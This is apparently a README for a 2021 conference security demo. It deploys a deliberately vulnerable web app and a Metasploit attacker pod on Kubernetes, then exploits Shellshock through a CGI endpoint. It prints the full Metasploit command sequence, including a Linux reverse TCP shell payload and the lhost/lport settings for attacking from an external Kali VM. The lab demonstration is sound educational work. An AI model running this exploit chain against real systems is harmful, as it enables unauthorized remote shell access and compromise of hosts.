CPX 2021 demo

Requirements

  • Helm3
  • Highly recommended: K9S
  • If you want to run the demo the hard way: kubectl

Installation

Make sure you are using the Helm3 client.

# Install our sushi restaurant web page
helm install -f cpx-sushi/values.yaml --namespace sushi --create-namespace sushi-restaurant cpx-sushi
# Install the attacker client
helm install -f attacker-cpx/values.yaml --namespace attacker --create-namespace attacker-client attacker-cpx
# Ignore the stdout printed by helm

Demo

Run K9S, open the namespace 'vulnerable' and verify that two pods are running there:

  • metasploit-client: We will use this as the "attacker machine"
  • vuln-app-cpx-helm-vulnerable: We will use this as the "victim machine"

Verify that the vulnerable namespace has a LoadBalancer service with an external IP assigned. Write down this value, as we will need it during the attack phase. This allows attacking the application even from outside the K8S cluster.

Start a shell within the metasploit container and execute:

cd /usr/src/metasploit-framework
./msfconsole -r docker/msfconsole.rc -y $APP_HOME/config/database.yml
# The metasploit framework shall start...

Using the Metasploit framework, we will use the apache_mod_cgi_bash_env_exec module:

search shellshock
# Locate the module with the name apache_mod_cgi_bash_env
use exploit/multi/http/apache_mod_cgi_bash_env_exec
# Check available options
show options
# Set RHOST to the external IP of the vuln-app-cpx-helm-vulnerable
set rhost <external-ip>
# You could also use the internal cluster IP since the metasploit pod has visibility of the vulnerable pod
set rport 80
set targeturi /cgi-bin/menu
# Set the payload
set payload linux/x86/shell/reverse_tcp
# Check if target is vulnerable
check
# Exploit vulnerability
exploit

At this point you may have multiple sessions opened in background mode. List them and use one of them to interact with the reverse TCP shell:

# List sessions
sessions
# Run interactive shell in session #1
sessions -i 1
# Start running commands
whoami
ls -la

Cleanup

helm uninstall sushi-restaurant -n sushi
helm uninstall attacker-client -n attacker

Attacker from external VM

In order to set up the attacker machine on an external VM running a distribution like Kali Linux, you will need to assign a public IP address to this machine so that it is reachable. Additionally, the port on which the reverse shell connection will be established needs to be allowed for inbound connections (i.e. in AWS the security group of the EC2 instance needs to allow inbound connections to port )

Running the exploit is very similar. First, ssh into the Kali Linux machine:

# Start metasploit console
msfconsole
# Follow the same steps that we already described
# We will need to set a few extra options
set lhost <public-ip-of-vm>
set lport <port-that-we-allow-input-connections>
# set lport 4444
check
exploit

Tips

  • Use the K9S client to demonstrate interactively how the attack is performed; it will save some time compared with running kubectl all the time.
